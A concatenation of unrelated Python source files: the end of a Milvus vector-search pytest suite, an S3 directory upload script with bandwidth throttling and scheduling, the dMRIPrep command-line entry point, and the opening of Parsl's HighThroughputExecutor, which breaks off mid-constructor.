range_one = gen_default_range_expr()
range_two = gen_default_range_expr(ranges={"GT": default_nb // 2, "LT": default_nb})
expr = {"must": [gen_default_vector_expr(default_query), range_one, range_two]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.level(2)
def test_query_multi_range_different_fields(self, connect, collection):
'''
method: build query with multi range, different field each range
expected: pass
'''
entities, ids = init_data(connect, collection)
range_first = gen_default_range_expr()
range_second = gen_default_range_expr(field="float", ranges={"GT": default_nb // 2, "LT": default_nb})
expr = {"must": [gen_default_vector_expr(default_query), range_first, range_second]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_query_single_range_multi_fields(self, connect, collection):
'''
method: build query with multi range, different field each range
expected: pass
'''
entities, ids = init_data(connect, collection)
range_first = {"int64": {"GT": 0, "LT": default_nb // 2}}
range_second = {"float": {"GT": default_nb / 2, "LT": float(default_nb)}}
range = update_range_expr({"range": {}}, [range_first, range_second])
expr = {"must": [gen_default_vector_expr(default_query), range]}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to build query expr both term and range
******************************************************************
"""
@pytest.mark.level(2)
def test_query_single_term_range_has_common(self, connect, collection):
'''
method: build query with single term single range
expected: pass
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
range = gen_default_range_expr(ranges={"GT": -1, "LT": default_nb // 2})
expr = {"must": [gen_default_vector_expr(default_query), term, range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == default_top_k
def test_query_single_term_range_no_common(self, connect, collection):
'''
method: build query with single term single range
expected: pass
'''
entities, ids = init_data(connect, collection)
term = gen_default_term_expr()
range = gen_default_range_expr(ranges={"GT": default_nb // 2, "LT": default_nb})
expr = {"must": [gen_default_vector_expr(default_query), term, range]}
query = update_query_expr(default_query, expr=expr)
connect.load_collection(collection)
res = connect.search(collection, query)
assert len(res) == nq
assert len(res[0]) == 0
"""
******************************************************************
# The following cases are used to build multi vectors query expr
******************************************************************
"""
@pytest.mark.skip("bigsheep-search-without-load")
def test_query_multi_vectors_same_field(self, connect, collection):
'''
method: build query with two vectors same field
expected: error raised
'''
entities, ids = init_data(connect, collection)
vector1 = default_query
vector2 = gen_query_vectors(field_name, entities, default_top_k, nq=2)
expr = {
"must": [vector1, vector2]
}
query = update_query_expr(default_query, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
class TestSearchDSLBools(object):
"""
******************************************************************
# The following cases are used to build invalid query expr
******************************************************************
"""
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_query_no_bool(self, connect, collection):
'''
method: build query without bool expr
expected: error raised
'''
entities, ids = init_data(connect, collection)
expr = {"bool1": {}}
query = expr
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_should_only_term(self, connect, collection):
'''
method: build query without must, with should.term instead
expected: error raised
'''
expr = {"should": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_query_should_only_vector(self, connect, collection):
'''
method: build query without must, with should.vector instead
expected: error raised
'''
expr = {"should": default_query["bool"]["must"]}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
def test_query_must_not_only_term(self, connect, collection):
'''
method: build query without must, with must_not.term instead
expected: error raised
'''
expr = {"must_not": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
def test_query_must_not_vector(self, connect, collection):
'''
method: build query without must, with must_not.vector instead
expected: error raised
'''
expr = {"must_not": default_query["bool"]["must"]}
query = update_query_expr(default_query, keep_old=False, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.skip("bigsheep-search-without-load")
def test_query_must_should(self, connect, collection):
'''
method: build query must, and with should.term
expected: error raised
'''
expr = {"should": gen_default_term_expr}
query = update_query_expr(default_query, keep_old=True, expr=expr)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
"""
******************************************************************
# The following cases are used to test `search` function
# with invalid collection_name, or invalid query expr
******************************************************************
"""
class TestSearchInvalid(object):
"""
Test search collection with invalid collection names
"""
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_partition(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_invalid_strs()
)
def get_invalid_field(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_simple_index()
)
def get_simple_index(self, request, connect):
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_search_with_invalid_collection(self, connect, get_collection_name):
collection_name = get_collection_name
with pytest.raises(Exception) as e:
res = connect.search(collection_name, default_query)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_search_with_invalid_partition(self, connect, collection, get_invalid_partition):
# tag = " "
tag = get_invalid_partition
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, partition_names=tag)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(2)
def test_search_with_invalid_field_name(self, connect, collection, get_invalid_field):
fields = [get_invalid_field]
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, fields=fields)
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(1)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_not_existed_field(self, connect, collection):
fields = [gen_unique_str("field_name")]
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query, fields=fields)
"""
Test search collection with invalid query
"""
@pytest.fixture(
scope="function",
params=gen_invalid_ints()
)
def get_top_k(self, request):
yield request.param
@pytest.mark.skip("bigsheep-search-without-load")
@pytest.mark.level(1)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_invalid_top_k(self, connect, collection, get_top_k):
'''
target: test search function, with the wrong top_k
method: search with top_k
expected: raise an error, and the connection is normal
'''
top_k = get_top_k
default_query["bool"]["must"][0]["vector"][field_name]["topk"] = top_k
with pytest.raises(Exception) as e:
res = connect.search(collection, default_query)
"""
Test search collection with invalid search params
"""
@pytest.fixture(
scope="function",
params=gen_invaild_search_params()
)
def get_search_params(self, request):
yield request.param
# 1463
@pytest.mark.level(2)
def test_search_with_invalid_params(self, connect, collection, get_simple_index, get_search_params):
'''
target: test search function, with the wrong nprobe
method: search with nprobe
expected: raise an error, and the connection is normal
'''
search_params = get_search_params
index_type = get_simple_index["index_type"]
if index_type in ["FLAT"]:
# pytest.skip("skip in FLAT index")
pass
if index_type != search_params["index_type"]:
# pytest.skip("skip if index_type not matched")
pass
entities, ids = init_data(connect, collection, nb=1200)
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, 1,
search_params=search_params["search_params"])
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.level(2)
def test_search_with_invalid_params_binary(self, connect, binary_collection):
'''
target: test search function, with the wrong nprobe
method: search with nprobe
expected: raise an error, and the connection is normal
'''
nq = 1
index_type = "BIN_IVF_FLAT"
int_vectors, entities, ids = init_binary_data(connect, binary_collection)
query_int_vectors, query_entities, tmp_ids = init_binary_data(connect, binary_collection, nb=1, insert=False)
connect.create_index(binary_collection, binary_field_name,
{"index_type": index_type, "metric_type": "JACCARD", "params": {"nlist": 128}})
connect.load_collection(binary_collection)
query, vecs = gen_query_vectors(binary_field_name, query_entities, default_top_k, nq,
search_params={"nprobe": 0}, metric_type="JACCARD")
with pytest.raises(Exception) as e:
res = connect.search(binary_collection, query)
# #1464
@pytest.mark.level(2)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_empty_params(self, connect, collection, args, get_simple_index):
'''
target: test search function, with empty search params
method: search with params
expected: raise an error, and the connection is normal
'''
index_type = get_simple_index["index_type"]
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
if index_type == "FLAT":
# pytest.skip("skip in FLAT index")
pass
entities, ids = init_data(connect, collection)
connect.create_index(collection, field_name, get_simple_index)
connect.load_collection(collection)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, 1, search_params={})
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_empty_vectors(self, connect, collection):
"""
target: test search function, with empty search vectors
method: search
expected: raise an exception
"""
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
connect.load_collection(collection)
query, vecs = gen_query_vectors(field_name, entities, default_top_k, nq=0)
with pytest.raises(Exception) as e:
res = connect.search(collection, query)
class TestSearchWithExpression(object):
@pytest.fixture(
scope="function",
params=[1, 10, 20],
)
def limit(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=gen_normal_expressions(),
)
def expression(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=[
{"index_type": "IVF_FLAT", "metric_type": "L2", "params": {"nlist": 100}},
]
)
def index_param(self, request):
return request.param
@pytest.fixture(
scope="function",
)
def search_params(self):
return {"metric_type": "L2", "params": {"nprobe": 10}}
@pytest.mark.tags(CaseLabel.tags_smoke)
def test_search_with_expression(self, connect, collection, index_param, search_params, limit, expression):
entities, ids = init_data(connect, collection)
assert len(ids) == default_nb
connect.create_index(collection, default_float_vec_field_name, index_param)
connect.load_collection(collection)
nq = 10
query_data = entities[2]["values"][:nq]
res = connect.search_with_expression(collection, query_data, default_float_vec_field_name, search_params,
limit, expression)
assert len(res) == nq
for topk_results in res:
assert len(topk_results) <= limit
def check_id_result(result, id):
limit_in = 5
ids = [entity.id for entity in result]
if len(result) >= limit_in:
return id in ids[:limit_in]
else:
return id in ids
|
upload_directory.py | #!/usr/bin/env python2
# coding: utf-8
import datetime
import errno
import getopt
import logging
import os
import sys
import threading
import time
import yaml
import boto3
from boto3.s3.transfer import TransferConfig
from botocore.client import Config
from pykit import jobq
MB = 1024**2
GB = 1024**3
mega = 1024.0 * 1024.0
uploaded_lock = threading.RLock()
uploaded_per_second = {
'start_time': time.time(),
'uploading': 0,
}
class RestrictUploadSpeed(object):
def __init__(self, fn):
self.fn = fn
def __call__(self, bytes_amount):
while True:
curr_tm = time.time()
with uploaded_lock:
if curr_tm - uploaded_per_second['start_time'] > 1:
uploaded_per_second['start_time'] = curr_tm
uploaded_per_second['uploading'] = 0
with uploaded_lock:
if uploaded_per_second['max_upload_bytes'] - uploaded_per_second['uploading'] > bytes_amount:
uploaded_per_second['uploading'] += bytes_amount
break
time.sleep(0.01)
logger.debug('about to sleep 10 millisecond to slow down, upload %d fn %s' % (
bytes_amount, self.fn))
stat = {
'bytes_uploaded': 0,
'uploaded_files': 0,
'start_time': time.time(),
}
stat_lock = threading.RLock()
flock = threading.RLock()
def to_unicode(s):
if isinstance(s, str):
return s.decode('utf-8')
return s
def to_utf8(s):
if isinstance(s, unicode):
return s.encode('utf-8')
return s
def _thread(func, args):
th = threading.Thread(target=func, args=args)
th.daemon = True
th.start()
return th
def _mkdir(path):
try:
os.makedirs(path, 0755)
except OSError as e:
if e[0] == errno.EEXIST and os.path.isdir(path):
pass
else:
raise
def _remove(path):
try:
os.remove(path)
except OSError as e:
if e[0] == errno.ENOENT or os.path.isdir(path):
pass
else:
raise
def get_conf(conf_path):
with open(conf_path) as f:
conf = yaml.safe_load(f.read())
conf['DATA_DIR'] = to_unicode(conf['DATA_DIR'])
conf['LOG_DIR'] = to_unicode(conf['LOG_DIR'])
return conf
def is_visible_dir(dir_name):
if dir_name.startswith('.'):
return False
return True
def is_visible_file(file_name):
if file_name.startswith('.'):
return False
return True
def get_iso_now():
datetime_now = datetime.datetime.utcnow()
return datetime_now.strftime('%Y%m%dT%H%M%SZ')
def dir_iter(dir_name, base_len, key_prefix):
q = []
base_dir = dir_name.split('/')
q.append(base_dir)
while True:
if len(q) < 1:
break
dir_parts = q.pop(0)
files = os.listdir('/'.join(dir_parts))
for f in files:
_dir_parts = dir_parts[:]
_dir_parts.append(f)
if not is_visible_dir(f):
continue
parts = []
for d in _dir_parts:
if isinstance(d, unicode):
parts.append(d)
continue
try:
d = d.decode('utf-8')
except UnicodeDecodeError:
d = d.decode('cp1252')
parts.append(d)
if os.path.isdir('/'.join(parts)):
q.append(parts)
yield dir_parts, base_len, key_prefix
def get_files_to_upload(dir_name, progress_file):
files = os.listdir(dir_name)
files_to_upload = {}
for f in files:
if not is_visible_file(f):
continue
file_name = os.path.join(dir_name, f)
if os.path.isfile(file_name):
files_to_upload[file_name] = True
fd = open(progress_file, 'a')
fd.close()
fd = open(progress_file)
while True:
line = fd.readline()
if line == '':
break
file_name = line.split()[0].decode('utf-8')
if file_name in files_to_upload:
files_to_upload.pop(file_name)
fd.close()
return files_to_upload
def upload_one_file(file_name, base_len, key_prefix, s3_client):
file_parts = file_name.split('/')
key = os.path.join(key_prefix, '/'.join(file_parts[base_len:]))
info = {'local_size': os.stat(file_name).st_size, }
callback = None
if cnf['ENABLE_BANDWIDTH']:
callback = RestrictUploadSpeed(file_name)
config = TransferConfig(multipart_threshold=4 * GB,
multipart_chunksize=512 * MB)
s3_client.upload_file(Filename=file_name,
Bucket=cnf['BUCKET_NAME'],
Key=key,
Config=config,
ExtraArgs={'ACL': cnf['FILE_ACL']},
Callback=callback,
)
logger.warn('have uploaded file %s' % file_name)
resp = s3_client.head_object(
Bucket=cnf['BUCKET_NAME'],
Key=key
)
logger.warn('have headed file %s' % file_name)
status = resp['ResponseMetadata']['HTTPStatusCode']
if status != 200:
logger.error('failed to put object: %s %d' % (key, status))
return
info['file_key'] = key
info['etag'] = resp['ETag']
info['resp_size'] = resp['ContentLength']
info['upload_time'] = get_iso_now()
return info
def boto_client():
session = boto3.session.Session()
client = session.client(
's3',
use_ssl=False,
aws_access_key_id=cnf['ACCESS_KEY'],
aws_secret_access_key=cnf['SECRET_KEY'],
config=Config(signature_version='s3v4'),
region_name='us-east-1',
endpoint_url='http://s2.i.qingcdn.com',
)
return client
def upload_one_directory(args):
s3_client = boto_client()
dir_parts, base_len, key_prefix = args
dir_name = '/'.join(dir_parts)
progress_file = os.path.join(dir_name, '.upload_progress')
files_to_upload = get_files_to_upload(dir_name, progress_file)
progress_f = open(progress_file, 'a')
print 'start to upload ' + dir_name
logger.info('start to upload ' + dir_name)
def _upload_file(file_name):
if cnf['ENABLE_SCHEDULE']:
check_schedule()
logger.info('start to upload file: %s' % file_name)
info = upload_one_file(file_name, base_len, key_prefix, s3_client)
if info is None:
return
if info['local_size'] != info['resp_size']:
logger.error(('file size not equal, local_size: %d,'
'response size: %d') % (info['local_size'],
info['resp_size']))
return
upload_time = get_iso_now()
line = '%s %s %s %d %s\n' % (
file_name, info['file_key'], info['etag'],
info['local_size'], upload_time)
line = to_utf8(line)
with flock:
progress_f.write(line)
total_progress_f.write(line)
total_progress_f.flush()
if cnf['CLEAR_FILES']:
_remove(file_name)
with stat_lock:
stat['bytes_uploaded'] += info['local_size']
stat['uploaded_files'] += 1
jobq.run(files_to_upload.keys(), [
(_upload_file, cnf['THREADS_NUM_FOR_FILE'])])
progress_f.close()
print 'finish to upload ' + dir_name
logger.info('finish to upload ' + dir_name)
def report(sess):
last_report_tm = time.time()
last_uploaded_bytes = stat['bytes_uploaded']
while not sess['stop']:
ts_now = time.time()
with stat_lock:
time_used = ts_now - last_report_tm
added_bytes = stat['bytes_uploaded'] - last_uploaded_bytes
if added_bytes == 0 or time_used == 0:
continue
last_report_tm = ts_now
last_uploaded_bytes = stat['bytes_uploaded']
report_str = ('stat: bytes uploaded: %dMB, has uploaded files num: %d average speed: %fMB/s') % (
stat['bytes_uploaded'] / MB, stat['uploaded_files'], added_bytes / time_used / MB)
logger.info(report_str)
print report_str
time.sleep(cnf['REPORT_INTERVAL'])
def run_once(dir_name, key_prefix):
if dir_name.endswith('/'):
print 'do not add / to the directory name: ' + dir_name
return
if not dir_name.startswith('/'):
print 'the directory name is not absolute path: ' + dir_name
return
if not os.path.exists(dir_name) or not os.path.isdir(dir_name):
print dir_name + ' is not exists or is not a directory'
return
base_len = len(dir_name.split('/'))
report_sess = {'stop': False}
report_th = _thread(report, (report_sess,))
jobq.run(dir_iter(dir_name, base_len, key_prefix),
[(upload_one_directory, cnf['THREADS_NUM_FOR_DIR'])])
report_sess['stop'] = True
report_th.join()
def run_forever(dir_name, key_prefix):
while True:
prev_uploaded = stat['bytes_uploaded']
run_once(dir_name, key_prefix)
if stat['bytes_uploaded'] - prev_uploaded == 0:
time.sleep(60)
def check_schedule():
start_h = int(cnf['SCHEDULE_START'].split(':')[0])
start_m = int(cnf['SCHEDULE_START'].split(':')[1])
stop_h = int(cnf['SCHEDULE_STOP'].split(':')[0])
stop_m = int(cnf['SCHEDULE_STOP'].split(':')[1])
start_m = start_m + start_h * 60
stop_m = stop_m + stop_h * 60
while True:
now = datetime.datetime.now()
now_h = now.hour
now_m = now.minute
now_m = now_m + now_h * 60
if start_m < stop_m:
if now_m >= start_m and now_m <= stop_m:
return
else:
wait_m = (start_m - now_m) % (60 * 24)
line = ('the schedule is from %s to %s,'
' need to wait %d hours and %d minutes') % (
cnf['SCHEDULE_START'], cnf['SCHEDULE_STOP'],
wait_m / 60, wait_m % 60)
print line
logger.warn(line)
time.sleep(60)
else:
if now_m > stop_m and now_m < start_m:
wait_m = (start_m - now_m) % (60 * 24)
line = ('the schedule is from %s to %s,'
' need to wait %d hours and %d minutes') % (
cnf['SCHEDULE_START'], cnf['SCHEDULE_STOP'],
wait_m / 60, wait_m % 60)
print line
logger.warn(line)
time.sleep(60)
else:
return
def add_logger():
log_file = os.path.join(cnf['LOG_DIR'], 'upload-log-for' +
cnf['DATA_DIR'].replace('/', '_') + '.log')
logger = logging.getLogger()
logger.setLevel(logging.INFO)
file_handler = logging.FileHandler(log_file)
formatter = logging.Formatter('[%(asctime)s, %(levelname)s] %(message)s')
file_handler.setFormatter(formatter)
logger.addHandler(file_handler)
return logger
if __name__ == "__main__":
opts, args = getopt.getopt(sys.argv[1:], '', ['conf=', ])
opts = dict(opts)
if opts.get('--conf') is None:
conf_path = '../conf/upload_directory.yaml'
else:
conf_path = opts['--conf']
cnf = get_conf(conf_path)
uploaded_per_second['max_upload_bytes'] = float(
cnf['BANDWIDTH']) * mega / 8
_mkdir(cnf['LOG_DIR'])
logger = add_logger()
fn = os.path.join(cnf['LOG_DIR'], 'upload-progress-for' +
cnf['DATA_DIR'].replace('/', '_') + '.log')
total_progress_f = open(fn, 'a')
if cnf['RUN_FOREVER']:
run_forever(cnf['DATA_DIR'], cnf['KEY_PREFIX'])
else:
run_once(cnf['DATA_DIR'], cnf['KEY_PREFIX'])
total_progress_f.close()
|
run.py | #!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# Copyright 2021 The NiPreps Developers <nipreps@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# We support and encourage derived works from this project, please read
# about our expectations at
#
# https://www.nipreps.org/community/licensing/
#
"""dMRI preprocessing workflow."""
from .. import config
def main():
"""Entry point."""
import os
import sys
import gc
from multiprocessing import Process, Manager
from .parser import parse_args
from ..utils.bids import write_derivative_description
parse_args()
popylar = None
if not config.execution.notrack:
import popylar
from ..__about__ import __ga_id__
config.loggers.cli.info(
"Your usage of dmriprep is being recorded using popylar (https://popylar.github.io/). ", # noqa
"For details, see https://nipreps.github.io/dmriprep/usage.html. ",
"To opt out, call dmriprep with a `--notrack` flag",
)
popylar.track_event(__ga_id__, "run", "cli_run")
# CRITICAL Save the config to a file. This is necessary because the execution graph
# is built as a separate process to keep the memory footprint low. The most
# straightforward way to communicate with the child process is via the filesystem.
config_file = config.execution.work_dir / ".dmriprep.toml"
config.to_filename(config_file)
# CRITICAL Call build_workflow(config_file, retval) in a subprocess.
# Because Python on Linux does not ever free virtual memory (VM), running the
# workflow construction jailed within a process preempts excessive VM buildup.
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
retcode = p.exitcode or retval.get("return_code", 0)
dmriprep_wf = retval.get("workflow", None)
# CRITICAL Load the config from the file. This is necessary because the ``build_workflow``
# function executed constrained in a process may change the config (and thus the global
# state of dMRIPrep).
config.load(config_file)
if config.execution.reports_only:
sys.exit(int(retcode > 0))
if dmriprep_wf and config.execution.write_graph:
dmriprep_wf.write_graph(graph2use="colored", format="svg", simple_form=True)
retcode = retcode or (dmriprep_wf is None) * os.EX_SOFTWARE
if retcode != 0:
sys.exit(retcode)
# Generate boilerplate
with Manager() as mgr:
from .workflow import build_boilerplate
p = Process(target=build_boilerplate, args=(str(config_file), dmriprep_wf))
p.start()
p.join()
if config.execution.boilerplate_only:
sys.exit(int(retcode > 0))
# Clean up master process before running workflow, which may create forks
gc.collect()
if popylar is not None:
popylar.track_event(__ga_id__, "run", "started")
config.loggers.workflow.log(
15,
"\n".join(
["dMRIPrep config:"] + ["\t\t%s" % s for s in config.dumps().splitlines()]
),
)
config.loggers.workflow.log(25, "dMRIPrep started!")
errno = 1 # Default is error exit unless otherwise set
try:
dmriprep_wf.run(**config.nipype.get_plugin())
except Exception as e:
if not config.execution.notrack:
popylar.track_event(__ga_id__, "run", "error")
config.loggers.workflow.critical("dMRIPrep failed: %s", e)
raise
else:
config.loggers.workflow.log(25, "dMRIPrep finished successfully!")
# Bother users with the boilerplate only iff the workflow went okay.
if (config.execution.output_dir / "dmriprep" / "logs" / "CITATION.md").exists():
config.loggers.workflow.log(
25,
"Works derived from this dMRIPrep execution should "
"include the following boilerplate: "
f"{config.execution.output_dir / 'dmriprep' / 'logs' / 'CITATION.md'}.",
)
if config.workflow.run_reconall:
from templateflow import api
from niworkflows.utils.misc import _copy_any
dseg_tsv = str(api.get("fsaverage", suffix="dseg", extension=[".tsv"]))
_copy_any(
dseg_tsv,
str(config.execution.output_dir / "dmriprep" / "desc-aseg_dseg.tsv"),
)
_copy_any(
dseg_tsv,
str(
config.execution.output_dir / "dmriprep" / "desc-aparcaseg_dseg.tsv"
),
)
errno = 0
finally:
from niworkflows.reports import generate_reports
from pkg_resources import resource_filename as pkgrf
# Generate reports phase
failed_reports = generate_reports(
config.execution.participant_label,
config.execution.output_dir,
config.execution.run_uuid,
config=pkgrf("dmriprep", "config/reports-spec.yml"),
packagename="dmriprep",
)
write_derivative_description(
config.execution.bids_dir, config.execution.output_dir / "dmriprep"
)
if failed_reports and not config.execution.notrack:
popylar.track_event(__ga_id__, "run", "reporting_error")
sys.exit(int((errno + failed_reports) > 0))
if __name__ == "__main__":
raise RuntimeError(
"dmriprep/cli/run.py should not be run directly;\n"
"Please `pip install` dmriprep and use the `dmriprep` command"
)
|
executor.py | """HighThroughputExecutor builds on the Swift/T EMEWS architecture to use MPI for fast task distribution
"""
from concurrent.futures import Future
import typeguard
import logging
import threading
import queue
import pickle
from multiprocessing import Process, Queue
from typing import Dict, List, Optional, Tuple, Union
import math
from ipyparallel.serialize import pack_apply_message # ,unpack_apply_message
from ipyparallel.serialize import deserialize_object # ,serialize_object
from parsl.app.errors import RemoteExceptionWrapper
from parsl.executors.high_throughput import zmq_pipes
from parsl.executors.high_throughput import interchange
from parsl.executors.errors import BadMessage, ScalingFailed, DeserializationError
from parsl.executors.base import ParslExecutor
from parsl.providers.provider_base import ExecutionProvider
from parsl.data_provider.staging import Staging
from parsl.utils import RepresentationMixin
from parsl.providers import LocalProvider
logger = logging.getLogger(__name__)
BUFFER_THRESHOLD = 1024 * 1024
ITEM_THRESHOLD = 1024
class HighThroughputExecutor(ParslExecutor, RepresentationMixin):
"""Executor designed for cluster-scale
The HighThroughputExecutor system has the following components:
1. The HighThroughputExecutor instance which is run as part of the Parsl script.
2. The Interchange which is acts as a load-balancing proxy between workers and Parsl
3. The multiprocessing based worker pool which coordinates task execution over several
cores on a node.
4. ZeroMQ pipes connect the HighThroughputExecutor, Interchange and the process_worker_pool
Here is a diagram
.. code:: python
| Data | Executor | Interchange | External Process(es)
| Flow | | |
Task | Kernel | | |
+----->|-------->|------------>|->outgoing_q---|-> process_worker_pool
| | | | batching | | |
Parsl<---Fut-| | | load-balancing| result exception
^ | | | watchdogs | | |
| | | Q_mngmnt | | V V
| | | Thread<--|-incoming_q<---|--- +---------+
| | | | | |
| | | | | |
+----update_fut-----+
Parameters
----------
provider : :class:`~parsl.providers.provider_base.ExecutionProvider`
Provider to access computation resources. Can be one of :class:`~parsl.providers.aws.aws.EC2Provider`,
:class:`~parsl.providers.cobalt.cobalt.Cobalt`,
:class:`~parsl.providers.condor.condor.Condor`,
:class:`~parsl.providers.googlecloud.googlecloud.GoogleCloud`,
:class:`~parsl.providers.gridEngine.gridEngine.GridEngine`,
:class:`~parsl.providers.jetstream.jetstream.Jetstream`,
:class:`~parsl.providers.local.local.Local`,
:class:`~parsl.providers.sge.sge.GridEngine`,
:class:`~parsl.providers.slurm.slurm.Slurm`, or
:class:`~parsl.providers.torque.torque.Torque`.
label : str
Label for this executor instance.
launch_cmd : str
Command line string to launch the process_worker_pool from the provider. The command line string
will be formatted with appropriate values for the following values (debug, task_url, result_url,
cores_per_worker, nodes_per_block, heartbeat_period ,heartbeat_threshold, logdir). For eg:
launch_cmd="process_worker_pool.py {debug} -c {cores_per_worker} --task_url={task_url} --result_url={result_url}"
address : string
An address to connect to the main Parsl process which is reachable from the network in which
workers will be running. This can be either a hostname as returned by `hostname` or an
IP address. Most login nodes on clusters have several network interfaces available, only
some of which can be reached from the compute nodes. Some trial and error might be
necessary to indentify what addresses are reachable from compute nodes.
worker_ports : (int, int)
Specify the ports to be used by workers to connect to Parsl. If this option is specified,
worker_port_range will not be honored.
worker_port_range : (int, int)
Worker ports will be chosen between the two integers provided.
interchange_port_range : (int, int)
Port range used by Parsl to communicate with the Interchange.
working_dir : str
Working dir to be used by the executor.
worker_debug : Bool
Enables worker debug logging.
managed : Bool
If this executor is managed by the DFK or externally handled.
cores_per_worker : float
cores to be assigned to each worker. Oversubscription is possible
by setting cores_per_worker < 1.0. Default=1
mem_per_worker : float
GB of memory required per worker. If this option is specified, the node manager
will check the available memory at startup and limit the number of workers such that
the there's sufficient memory for each worker. Default: None
max_workers : int
Caps the number of workers launched by the manager. Default: infinity
prefetch_capacity : int
Number of tasks that could be prefetched over available worker capacity.
When there are a few tasks (<100) or when tasks are long running, this option should
be set to 0 for better load balancing. Default is 0.
suppress_failure : Bool
If set, the interchange will suppress failures rather than terminate early. Default: False
heartbeat_threshold : int
Seconds since the last message from the counterpart in the communication pair:
(interchange, manager) after which the counterpart is assumed to be un-available. Default:120s
heartbeat_period : int
Number of seconds after which a heartbeat message indicating liveness is sent to the
counterpart (interchange, manager). Default:30s
poll_period : int
Timeout period to be used by the executor components in milliseconds. Increasing poll_periods
trades performance for cpu efficiency. Default: 10ms
worker_logdir_root : string
In case of a remote file system, specify the path to where logs will be kept.
"""
@typeguard.typechecked
def __init__(self,
label: str = 'HighThroughputExecutor',
provider: ExecutionProvider = LocalProvider(),
launch_cmd: Optional[str] = None,
address: str = "127.0.0.1",
worker_ports: Optional[Tuple[int, int]] = None,
worker_port_range: Optional[Tuple[int, int]] = (54000, 55000),
interchange_port_range: Optional[Tuple[int, int]] = (55000, 56000),
storage_access: Optional[List[Staging]] = None,
working_dir: Optional[str] = None,
worker_debug: bool = False,
cores_per_worker: float = 1.0,
mem_per_worker: Optional[float] = None,
max_workers: Union[int, float] = float('inf'),
prefetch_capacity: int = 0,
heartbeat_threshold: int = 120,
heartbeat_period: int = 30,
poll_period: int = 10,
suppress_failure: bool = False,
managed: bool = True,
worker_logdir_root: Optional[str] = None):
logger.debug("Initializing HighThroughputExecutor")
self.label = label
self.launch_cmd = launch_cmd
self.provider = provider
self.worker_debug = worker_debug
self.storage_access = storage_access
self.working_dir = working_dir
self.managed = managed
self.blocks = {} # type: Dict[str, str]
self.tasks = {} # type: Dict[str, Future]
self.cores_per_worker = cores_per_worker
self.mem_per_worker = mem_per_worker
self.max_workers = max_workers
self.prefetch_capacity = prefetch_capacity
mem_slots = max_workers
cpu_slots = max_workers
if hasattr(self.provider, 'mem_per_node') and \
self.provider.mem_per_node is not None and \
mem_per_worker is not None and \
mem_per_worker > 0:
mem_slots = math.floor(self.provider.mem_per_node / mem_per_worker)
if hasattr(self.provider, 'cores_per_node') and \
self.provider.cores_per_node is not None:
cpu_slots = math.floor(self.provider.cores_per_node / cores_per_worker)
self.workers_per_node = min(max_workers, mem_slots, cpu_slots)
if self.workers_per_node == float('inf'):
